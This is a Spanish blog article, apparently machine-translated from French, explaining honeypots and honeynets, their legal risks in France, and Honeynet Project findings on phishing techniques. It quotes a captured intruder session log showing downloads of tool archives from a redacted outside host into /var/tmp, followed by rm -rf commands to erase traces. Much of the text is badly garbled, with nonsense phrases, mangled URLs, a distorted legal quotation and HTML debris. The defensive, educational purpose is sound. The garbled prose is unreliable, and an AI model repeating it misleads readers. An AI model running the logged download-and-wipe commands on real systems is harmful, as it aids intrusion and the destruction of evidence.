Honeypots: trampas piratas

No lo escuchamos a menudo, pero los honeypots (honeypots en francés) son trampas piratas que ya son hace más de diez años.

un honeypot es un concepto desarrollado por expertos en seguridad informática cuyo propósito es No para evitar que los hackers entren en sus sistemas, sino por el contrario para atraparlos cuando lleguen. Y, por lo tanto, estudiar su comportamiento para protegerse mejor, además de restringir el acceso a todo el sistema de producción.

Estos mismos honeypots no se utilizan y utilizables por cualquier persona en el significado de donde involucran el contacto con un verdadero y Atacante determinado. Este no es el único riesgo debido a su uso, hablaremos de ello más tarde.

El propósito de este artículo es ir más lejos que solo presentar los honeypots, observando un caso concreto de ataque «.

¿Cómo funcionan los honeypots?

En la base, el objetivo no es atraer voluntariamente a todos los hackers para que los tome en la bolsa, sino de estudiar sus métodos de campo, en todos. discreción.

«Tome una mano de HACK en el HoneyPar» Haga clic para TweetShare en FacebookCompartir en LinkedIn

El Honeypot debe configurarse correctamente dependiendo de los atacantes para estudiar. Una configuración demasiado simplista permitirá ingresar a los kildies de script y otros software automatizado. Mientras que los ataques más específicos cuya metodología es más interesante requiere una configuración adecuada.

un sistema voluntario vulnerable y, por lo tanto, se coloca en un entorno controlado y monitoreado permanentemente. El uso de honeypots requiere conocimiento puntiagudo, no solo para predecir ataques, sino también para gestionar problemas etechnicos (configuraciones).

frascos de miel, un problema legal?

Si el ‘no escuchamos Mucho sobre estos honeypots, es particularmente porque hay un potencial de problemas legales debido a su uso.

De hecho, el artículo 23 de la ley del 29 de julio de 1881 sobre la libertad de prensa nos dice que:

será castigado como cómplices de un delito de acción calificado u ofensa a aquellos que, por discursos, […] por cualquier medio de comunicación al público por medios electrónicos, habrán hecho directamente que el autor o los autores se comprometan. Dicha acción, si la provocación ha sido seguida por efecto.

aquí «, provocó para cometer acción» (piratería) hace que esta acción se complique.

, por lo tanto, ser difícil de quejarse de un pirateo en el caso en que uno sea complicado con eso-c i.

Este no es el único problema legal porque es probable que el honeypot recupere los datos personales cuyo tratamiento primero debe ser el tema de una declaración a la CNIL.

un caso concreto de Ataque por phishing

Los miembros de la asociación sin fines de lucro El proyecto HoneyNet comparte lo que han aprendido sobre los ataques identificados y estudiados en forma de reportable en la siguiente dirección:

https: //www.honeynet.org/papers

Por ejemplo, su estudio sobre los ataques de phishing de interferencia técnica utilizada por los atacantes:

  • utilizando direcciones IP en lugar de dominio Los nombres
  • usando nombres de dominio muy similares (el clásico)
  • intento de comprometer la web para referirse a otra dirección URL
  • manipular el archivo de hosts en la computadora de la víctima Para señalar un nombre de dominio a otra dirección IP
  • use un sitio malicioso como pro XY, quien recuperará las contraseñas ingresadas en el formulario y devolverlas al sitio real
  • … etc

tanta información ya conocida y que probablemente ya no funciona (El informe se da un bit), pero puede permitir fácilmente detectar otras técnicas nunca antes vistas.

La cantidad masiva de información que debe tratarse con algunos problemas, se ha creado un guión llamado Honeynap, cuyo propósito es Para resaltar la información atractiva sobre las actividades del pirata.

Se ha realizado un ejemplo en la siguiente dirección:

http: //old.honeyet.org/papers/phishing/ Ejemplos / HoneyNap_Sample1.txt // P> Importación de archivos de descarga del atacante Probablemente que contengan archivos maliciosos. También lo ve en la colocación de archivos en la carpeta temporal del sistema en el que ha ingresado e incluso los rastros de FREPPORT (las direcciones IP y los sitios adjuntos tienen sido editado):

 25 815 2004-08-02 20: 22: 53.337162 10.2.1.146 - 213.218.xxx.xxx http get /arhive/psy.tgz / 1.027077 2004-08-02 20: 37: 13.767699 10.2.1.146 - 213.218.xxx.xxx http Obtener /arhive/pico.tgz http / 1.0 [...] 
 [2004-08-02 19:11:41 10.2.1.146 26994 Bash 0] W [BS] CD / VAR / TMP 
 [2004-08-02 19:11:42 10.2.1.146 26994 bash 0] ls 
 [2004-08-02 19:12:04 10.2.1.146 26994 Bash 0] C [BS] WW [BS] Obtenga XXX [BS].COM / ARHV [BS] IVE / [BS] [BS] [BS] [BS] [BS] [BS] [BS] Hive / Socklist.tgz [2004-08 - 02 19:18:10 10.2.1.146 26994 Bash 0] Tar V 
 [...] 
 [2004-08-02 19:30:34 10.2.1.146 26994 Bash 0] RM -RF * Z [2004-08-02 19:30:36 10.2.1.146 26994 Bash 0] RM -RF P [2004-08-02 19:30:38 10.2.1.146 26994 Bash 0] RM - RF PC  

(NDLR: [BS] significa "retroceso", el atacante presiona la tecla "Atrás Atrás" para corregir)

Este ejemplo nos permite aquí de aquí en la misma, gracias al honeypot, el La metodología del atacante una vez ingresó al sistema.

de la honeypot a la red de miel

como Indica que el artículo en el diario de ITQUIS habla de él:

"Para hacer que la trampa sea más discreta, es posible crear una red de miel o ollas de miel"

un honeynet (miel Red) es un conjunto de honeypots. Dado que la red en cuestión no es un sistema de producción, no hay una actividad básica aparte de las actividades potencialmente maliciosas iniciadas por los hackers.

El propósito principal de HoneyNet es recuperar información sobre amenazas. Esta información se puede utilizar en el entorno académico para fines de investigación, o dentro de las empresas de seguridad, la percreación de soluciones de antivirus efectivas, así como la firma de los sistemas de detección de intrusos.

La palabra del fin

Concluiré con pistas adicionales:

No solo hay honeypots del sistema, sino también honeypots en teléfonos inteligentes, así como los proyectos realizados en el campo.

Dejo enlaces:

  • http://www.ieee-security.org/tc/sp2022/posters/honeydroid__creating_a_smart_phone_honeypot.pdf
  • http: / /tools.kali.org/wirels.kali.org/wireless-attacks/bluepot "/ LI>" / ul> "" Y tú, ¿qué piensas de Honeypots? Buena o mala idea? No dude en contribuir si tiene algo que agregar

    e -book PDF 6 errores adorados por los hackers informáticos

    que siempre lo harán vulnerable en los mitos de linalatos del antivirus perfecto... lo que saben los piratas sobre youtc...

    Descargo mi guía gratuita ×

    ¿A qué dirección de correo electrónico le gustaría recibir la guía?

    artículos similares

    Las 5 grandes debilidades que piratas aman y usted Necesidad de corregir

    Sabemos que algunos hackers pueden ingresar cualquier sistema de una manera desconcertante. Pero esta facilidad de intrusión no siempre cae bajo magia negra o talento especial. No hay nada más interesante para un hacker que un objetivo fácil. Las empresas forzadas son...

    Los 5 errores más comunes de principiantes en hacking

    Decidí escribir este artículo para todos los principiantes en hacking. ¡Todos somos principiantes un día, incluso los hackers más grandes han sido, y no ese día o dos! Muchos más tarde se encontraron más tarde para decir que habían cometido grandes errores en el...

    El miedo a los hackers

    Los hackers a menudo se ven a menudo como personas un poco reclusan y no son confiables. Es suficiente que el usuario lambda esté pirateando un día para que desarrolle un miedo a los piratas informáticos irracionales. Este es el caso de una persona que he conocido recientemente, ahora es profesor...

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *